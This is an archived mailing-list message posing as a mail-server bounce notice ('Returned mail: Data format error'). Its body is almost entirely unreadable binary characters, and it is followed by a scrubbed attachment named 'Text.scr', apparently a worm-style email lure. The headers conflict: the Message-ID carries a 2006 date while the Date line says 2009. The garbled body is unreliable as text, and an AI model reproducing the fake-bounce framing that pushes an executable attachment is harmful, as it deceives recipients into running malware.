From MAILER-DAEMON at berlios.de  Mon Oct  5 19:40:11 2009
From: MAILER-DAEMON at berlios.de (Bounced mail)
Date: Mon, 5 Oct 2009 12:40:11 -0500
Subject: [Pplt-help] Returned mail: Data format error
Message-ID: <200607051741.k65Hfq227496@bat.berlios.de>

?y?
5A???fh7~??4k>ENGA?h
???O??q?d???h????????A?z/???G?$?0?"\?I0?????{4}?4?????|?tjr??>?x]??(????I?*:????G?|?????t?!-???.h!!V??z??,??*Z??????:);
???L?????F_??Y`?u?2G????Iwb?y??????
??8
9?C??j????c?'T?8???i??xJ????
??#???l;c&????.???e?
-?$R?_".?p{$?/2?%??B?-?A??????Jq??????Km??
??????C?m?0?
??*?O!??Y{5I,{?I
?e???R?????^u?????????)?&??q??uz;?x??
T]?P\H???i????uA???1A???#v??%??|?A;L??!
?V?g?????:???fNc???Z??v-S?????????U???>???i???????mJ;???p??z{ ??I6?;?5~kp??|`???%/t??BWoKr?*?:??W ????C!S????F?C
?kx|??4?4???JjB?\??w?D-C?Z?k??32H?*0??Pw??????%?"?'?m ???3
?E-??#A??E?
*J???.?????W??M??3??b13??????!???????? d9R?????W?X?M????x?Sv7*?H??hj??p|V??R??u10?E??$??g?5?s:???`?T???I~0
#??:1c?? ?
?y^??P,ktV?LK?b?y4h?k/??g?3>?3???????$Y??<??T??h?t
?~?*????Mf?vJ?5?D??????????~??????\??zm???T??g/Kc??????????F????4?_!?]?
tYF???{?*?Y?Qn?q4??????C?k????0f?.???7??}!??iW????f"H/w?_??o????"?r7
A)?v>l79?5}A'???n???
?iy??E]??x?E?:!;RPJzx?{?kU6gZt??r?N~[???N????h?????-?0i???I????o???Y???????|IQy???)-??
????l????u?q?q?????A,{!e??}?B?"?`?s??8?p?????]/!'?j???lG??????r?U-?i?T7n#?u?k1`Xcw-?y???H
?nL9?f?M??'?%?Ya(YW??V?K????1k??????*???z??>??g?/??6??r??0
??e$ZU8We?1??R???.??sk???E???OdI???????^???~??ZZ?:?t2??De[|xADQ???V?hr{??????9f?h?SkV?-?
%?9?z?????h?&????J???v??
?~?&mS??o?U??????(????qj??f??}q-??%?)???????~??J??[Z????X?i?????K????`1??I#UA?D8??w?????z}??n??~\dm??j?2?o*??<w??9;?3?<a
g??r)??YA)?^??'U?WF?`???*?f?O>????A(}???8}?7????V???S??
?
?~???6#?xF????ZDT?N?????B?8z<v??????4??"?7k8??|"???}????????6???5?-??????j-???Up%??(????}x<????v7G?f??|?dhV?,&?????U?J??F???????#??P.?_D??*???;t???dNr?5e????,?W???8?*?o#??s???]*6v?r?MF>G??{w?c?XCP?v?I?q??X5-?5??"??t?
??c0v?x
)9~??z?
?H??h?tW!????`?a)SI:??m?j?g?i3!?oJ???_h6?1
{?{}?sjoE???t??g;i>Ft???v???Cv??
?2???XfINh?????[???!<?D(?V- ????"m??Lh??m?V????lF??bbj???j????
?<?Ms?F?)???[`??q???Z??;??"??????P?>???5x???lq?f?9  k???D`???m[IK?p?l???H?
?R?_:H???$??g?`d????cB1????Q?????/0?N?,?????q??q??????%??U?0??f???u????b???[??^?"q???"?????&f????3?)?)?o??x?<??????????B?EcV>OuDPc ?T?k`.??{?)?|??0
y^?mJ?V?s
?<T???
?}t?k??rWn-???Q??:,*?#?????a^I?D??90?b.??O?????$????E4W???-X??t??t>Z):m}d??????u????
W?x?&??J???7???B????v5`??????v}???J#??Q????
???t?
(&?p??hB]??????[??
?%B???~&?X?AqN}<n??J???f<???A??X960A?c????-???}/???(?2?$v???4?Z%fI/??<?
??r??v#?Z?t?????>??d??*e???A??4?Z?_r*?3??Al???????4??l>?7??*wp\???????l0U?;;^t.?kxw?g?Z&D?
????*???btz????OB??Q???>?[?
{`?)?O?a????>Y'?tN????{c???\????#n?m??Gv?k?????A7????/?????{8KNO???????`?M??J? wQi???s?S2??"??6z??`??m^!????V?;?????3?yY?/po??
????c???U???'??-????Z?0y
?(p?????|?m??Y?

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Text.scr
Type: application/octet-stream
Size: 28864 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/pplt-help/attachments/20091005/3e20a4a0/attachment.obj>

